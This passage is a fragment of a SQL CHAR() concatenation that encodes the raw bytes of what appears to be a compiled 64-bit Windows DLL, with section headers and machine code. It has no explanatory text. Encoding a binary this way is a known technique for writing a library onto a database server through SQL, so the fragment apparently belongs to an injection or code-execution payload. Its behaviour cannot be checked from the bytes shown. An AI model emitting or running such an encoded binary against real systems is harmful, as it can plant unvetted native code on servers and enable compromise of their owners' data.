,CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x38),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x26),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0xc0),CHAR(0x2e),CHAR(0x70),CHAR(0x64),CHAR(0x61),CHAR(0x74),CHAR(0x61),CHAR(0x00),CHAR(0x00),CHAR(0xc8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x28),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x2e),CHAR(0x72),CHAR(0x65),CHAR(0x6c),CHAR(0x6f),CHAR(0x63),CHAR(0x00),CHAR(0x00),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x60),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x2a),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x42),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x18),CHAR(0x48),CHAR(0x89),CHAR(0x7c),CHAR(0x24),CHAR(0x20),CHAR(0x41),CHAR(0x56),CHAR(0x48),CHAR(0x81),CHAR(0xec),CHAR(0x40),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x05),CHAR(0xe9),CHAR(0x2f),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x33),CHAR(0xc4),CHAR(0x48),CHAR(0x89),CHAR(0x84),CHAR(0x24),CHAR(0x30),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x30),CHAR(0x41),CHAR(0xb8),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xf1),CHAR(0xff),CHAR(0x50),CHAR(0x30),CHAR(0x83),CHAR(0xf8),CHAR(0xfe),CHAR(0x75),CHAR(0x11),CHAR(0x49),CHAR(0x8b),CHAR(0x06),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x30),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x50),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x54),CHAR(0x24),CHAR(0x40),CHAR(0xb9),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x05),CHAR(0x6b),CHAR(0x21),CHAR(0x00),CHAR(0x00),CHAR(0x66),CHAR(0x66),CHAR(0x66),CHAR(0x0f),CHAR(0x1f),CHAR(0x84),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x92),CHAR(0x80),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x10),CHAR(0x00),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x10),CHAR(0x48),CHAR(0x8d),CHAR(0x80),CHAR(0x80),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0x80),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0xa0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x90),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0xb0),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0xa0),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0xc0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0xb0),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0xd0),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0xc0),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0xe0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0xd0),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0xf0),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0xe0),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0xf0),CHAR(0x48),CHAR(0x83),CHAR(0xe9),CHAR(0x01),CHAR(0x75),CHAR(0xad),CHAR(0x48),CHAR(0x8b),CHAR(0x48),CHAR(0x60),CHAR(0x0f),CHAR(0x10),CHAR(0x00),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x10),CHAR(0x0f),CHAR(0x11),CHAR(0x02),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0x20),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x10),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x30),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0x20),CHAR(0x0f),CHAR(0x10),CHAR(0x40),CHAR(0x40),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x30),CHAR(0x0f),CHAR(0x10),CHAR(0x48),CHAR(0x50),CHAR(0x0f),CHAR(0x11),CHAR(0x42),CHAR(0x40),CHAR(0x0f),CHAR(0x11),CHAR(0x4a),CHAR(0x50),CHAR(0x48),CHAR(0x89),CHAR(0x4a),CHAR(0x60),CHAR(0x8b),CHAR(0x48),CHAR(0x68),CHAR(0x89),CHAR(0x4a),CHAR(0x68),CHAR(0x0f),CHAR(0xb7),CHAR(0x48),CHAR(0x6c),CHAR(0x66),CHAR(0x89),CHAR(0x4a),CHAR(0x6c),CHAR(0x0f),CHAR(0xb6),CHAR(0x48),CHAR(0x6e),CHAR(0x88),CHAR(0x4a),CHAR(0x6e),CHAR(0xba),CHAR(0xef),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x01),CHAR(0xff),CHAR(0x90),CHAR(0x80),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x41),CHAR(0xb9),CHAR(0xef),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xf0),CHAR(0x45),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8d),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x8b),CHAR(0xd6),CHAR(0x48),CHAR(0x89),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x80),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0xfb),CHAR(0x1f),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0x01),CHAR(0x41),CHAR(0xff),CHAR(0x50),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8d),CHAR(0x0d),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8d),CHAR(0x05),CHAR(0x19),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xd0),CHAR(0x48),CHAR(0x8b),CHAR(0xf8),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x88),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0xd7),CHAR(0x4c),CHAR(0x8b),CHAR(0xc0),CHAR(0x4c),CHAR(0x8b),CHAR(0x09),CHAR(0x41),CHAR(0xff),CHAR(0x91),CHAR(0x90),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8d),CHAR(0x0d),CHAR(0x00),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8d),CHAR(0x05),CHAR(0x11),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xd7),CHAR(0x48),CHAR(0x8b),CHAR(0xd8),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x08),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x4c),CHAR(0x8b),CHAR(0xce),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x28),CHAR(0xef),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0xd3),CHAR(0x48),CHAR(0xc7),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8b),CHAR(0x11),CHAR(0x41),CHAR(0xff),CHAR(0x92),CHAR(0x10),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x4c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0xd6),CHAR(0x4c),CHAR(0x8b),CHAR(0x01),CHAR(0x41),CHAR(0xff),CHAR(0x90),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x8b),CHAR(0x16),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0xff),CHAR(0x52),CHAR(0x28),CHAR(0xb8),CHAR(0x06),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0x8c),CHAR(0x24),CHAR(0x30),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x33),CHAR(0xcc),CHAR(0xe8),CHAR(0xb0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4c),CHAR(0x8d),CHAR(0x9c),CHAR(0x24),CHAR(0x40),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x8b),CHAR(0x5b),CHAR(0x18),CHAR(0x49),CHAR(0x8b),CHAR(0x73),CHAR(0x20),CHAR(0x49),CHAR(0x8b),CHAR(0x7b),CHAR(0x28),CHAR(0x49),CHAR(0x8b),CHAR(0xe3),CHAR(0x41),CHAR(0x5e),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x4d),CHAR(0x8b),CHAR(0x41),CHAR(0x38),CHAR(0x48),CHAR(0x8b),CHAR(0xca),CHAR(0x49),CHAR(0x8b),CHAR(0xd1),CHAR(0xe8),CHAR(0x0d),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x40),CHAR(0x53),CHAR(0x45),CHAR(0x8b),CHAR(0x18),CHAR(0x48),CHAR(0x8b),CHAR(0xda),CHAR(0x41),CHAR(0x83),CHAR(0xe3),CHAR(0xf8),CHAR(0x4c),CHAR(0x8b),CHAR(0xc9),CHAR(0x41),CHAR(0xf6),CHAR(0x00),CHAR(0x04),CHAR(0x4c),CHAR(0x8b),CHAR(0xd1),CHAR(0x74),CHAR(0x13),CHAR(0x41),CHAR(0x8b),CHAR(0x40),CHAR(0x08),CHAR(0x4d),CHAR(0x63),CHAR(0x50),CHAR(0x04),CHAR(0xf7),CHAR(0xd8),CHAR(0x4c),CHAR(0x03),CHAR(0xd1),CHAR(0x48),CHAR(0x63),CHAR(0xc8),CHAR(0x4c),CHAR(0x23),CHAR(0xd1),CHAR(0x49),CHAR(0x63),CHAR(0xc3),CHAR(0x4a),CHAR(0x8b),CHAR(0x14),CHAR(0x10),CHAR(0x48),CHAR(0x8b),CHAR(0x43),CHAR(0x10),CHAR(0x8b),CHAR(0x48),CHAR(0x08),CHAR(0x48),CHAR(0x8b),CHAR(0x43),CHAR(0x08),CHAR(0xf6),CHAR(0x44),CHAR(0x01),CHAR(0x03),CHAR(0x0f),CHAR(0x74),CHAR(0x0b),CHAR(0x0f),CHAR(0xb6),CHAR(0x44),CHAR(0x01),CHAR(0x03),CHAR(0x83),CHAR(0xe0),CHAR(0xf0),CHAR(0x4c),CHAR(0x03),CHAR(0xc8),CHAR(0x4c),CHAR(0x33),CHAR(0xca),CHAR(0x49),CHAR(0x8b),CHAR(0xc9),CHAR(0x5b),CHAR(0xe9),CHAR(0x19),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x66),CHAR(0x66),CHAR(0x0f),CHAR(0x1f),CHAR(0x84),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x3b),CHAR(0x0d),CHAR(0x41),CHAR(0x2d),CHAR(0x00),CHAR(0x00),CHAR(0xf2),CHAR(0x75),CHAR(0x12),CHAR(0x48),CHAR(0xc1),CHAR(0xc1),CHAR(0x10),CHAR(0x66),CHAR(0xf7),CHAR(0xc1),CHAR(0xff),CHAR(0xff),CHAR(0xf2),CHAR(0x75),CHAR(0x02),CHAR(0xf2),CHAR(0xc3),CHAR(0x48),CHAR(0xc1),CHAR(0xc9),CHAR(0x10),CHAR(0xe9),CHAR(0x97),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x28),CHAR(0x85),CHAR(0xd2),CHAR(0x74),CHAR(0x39),CHAR(0x83),CHAR(0xea),CHAR(0x01),CHAR(0x74),CHAR(0x28),CHAR(0x83),CHAR(0xea),CHAR(0x01),CHAR(0x74),CHAR(0x16),CHAR(0x83),CHAR(0xfa),CHAR(0x01),CHAR(0x74),CHAR(0x0a),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0xe8),CHAR(0x7e),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x05),CHAR(0xe8),CHAR(0x4f),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0xb6),CHAR(0xc0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xc3),CHAR(0x49),CHAR(0x8b),CHAR(0xd0),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0x0f),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4d),CHAR(0x85),CHAR(0xc0),CHAR(0x0f),CHAR(0x95),CHAR(0xc1),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x28),CHAR(0xe9),CHAR(0x18),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x48),CHAR(0x89),CHAR(0x74),CHAR(0x24),CHAR(0x10),CHAR(0x48),CHAR(0x89),CHAR(0x7c),CHAR(0x24),CHAR(0x20),CHAR(0x41),CHAR(0x56),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x20),CHAR(0x48),CHAR(0x8b),CHAR(0xf2),CHAR(0x4c),CHAR(0x8b),CHAR(0xf1),CHAR(0x33),CHAR(0xc9),CHAR(0xe8),CHAR(0xee),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x0f),CHAR(0x84),CHAR(0xc8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x75),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xd8),CHAR(0x88),CHAR(0x44),CHAR(0x24),CHAR(0x40),CHAR(0x40),CHAR(0xb7),CHAR(0x01),CHAR(0x83),CHAR(0x3d),CHAR(0x6d),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x0f),CHAR(0x85),CHAR(0xc5),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x5d),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xc0),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x74),CHAR(0x4f),CHAR(0xe8),CHAR(0xcf),CHAR(0x09),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xfa),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x21),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0x86),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x77),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x10),CHAR(0x0c),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x75),CHAR(0x29),CHAR(0xe8),CHAR(0x5d),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x74),CHAR(0x20),CHAR(0x48),CHAR(0x8d),CHAR(0x15),CHAR(0x56),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8d),CHAR(0x0d),CHAR(0x47),CHAR(0x1d),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xea),CHAR(0x0b),CHAR(0x00),CHAR(0x00),CHAR(0xc7),CHAR(0x05),CHAR(0x08),CHAR(0x32),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x32),CHAR(0xff),CHAR(0x8a),CHAR(0xcb),CHAR(0xe8),CHAR(0xd2),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x84),CHAR(0xff),CHAR(0x75),CHAR(0x3f),CHAR(0xe8),CHAR(0x18),CHAR(0x08),CHAR(0x00),CHAR(0x00),CHAR(0x48),CHAR(0x8b),CHAR(0xd8),CHAR(0x48),CHAR(0x83),CHAR(0x38),CHAR(0x00),CHAR(0x74),CHAR(0x24),CHAR(0x48),CHAR(0x8b),CHAR(0xc8),CHAR(0xe8),CHAR(0x1f),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x84),CHAR(0xc0),CHAR(0x74),CHAR(0x18),CHAR(0x4c),CHAR(0x8b),CHAR(0xc6),CHAR(0xba),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x49),CHAR(0x8b),CHAR(0xce),CHAR(0x48),CHAR(0x8b),CHAR(0x03),CHAR(0x4c),CHAR(0x8b),CHAR(0x0d),CHAR(0xe2),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x41),CHAR(0xff),CHAR(0xd1),CHAR(0xff),CHAR(0x05),CHAR(0x21),CHAR(0x2c),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xeb),CHAR(0x02),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x30),CHAR(0x48),CHAR(0x8b),CHAR(0x74),CHAR(0x24),CHAR(0x38),CHAR(0x48),CHAR(0x8b),CHAR(0x7c),CHAR(0x24),CHAR(0x48),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x20),CHAR(0x41),CHAR(0x5e),CHAR(0xc3),CHAR(0xb9),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0xcc),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x90),CHAR(0xcc),CHAR(0xcc),CHAR(0xcc),CHAR(0x48),CHAR(0x89),CHAR(0x5c),CHAR(0x24),CHAR(0x08),CHAR(0x57),CHAR(0x48),CHAR(0x83),CHAR(0xec),CHAR(0x30),CHAR(0x40),CHAR(0x8a),CHAR(0xf9),CHAR(0x8b),CHAR(0x05),CHAR(0xe1),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0x85),CHAR(0xc0),CHAR(0x7f),CHAR(0x0d),CHAR(0x33),CHAR(0xc0),CHAR(0x48),CHAR(0x8b),CHAR(0x5c),CHAR(0x24),CHAR(0x40),CHAR(0x48),CHAR(0x83),CHAR(0xc4),CHAR(0x30),CHAR(0x5f),CHAR(0xc3),CHAR(0xff),CHAR(0xc8),CHAR(0x89),CHAR(0x05),CHAR(0xc8),CHAR(0x2b),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x5b),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xd8),CHAR(0x88),CHAR(0x44),CHAR(0x24),CHAR(0x20),CHAR(0x83),CHAR(0x3d),CHAR(0x56),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x75),CHAR(0x37),CHAR(0xe8),CHAR(0x6f),CHAR(0x05),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x0a),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0xe8),CHAR(0x01),CHAR(0x09),CHAR(0x00),CHAR(0x00),CHAR(0x83),CHAR(0x25),CHAR(0x3e),CHAR(0x31),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x8a),CHAR(0xcb),CHAR(0xe8),CHAR(0x0b),CHAR(0x07),CHAR(0x00),CHAR(0x00),CHAR(0x33),CHAR(0xd2),CHAR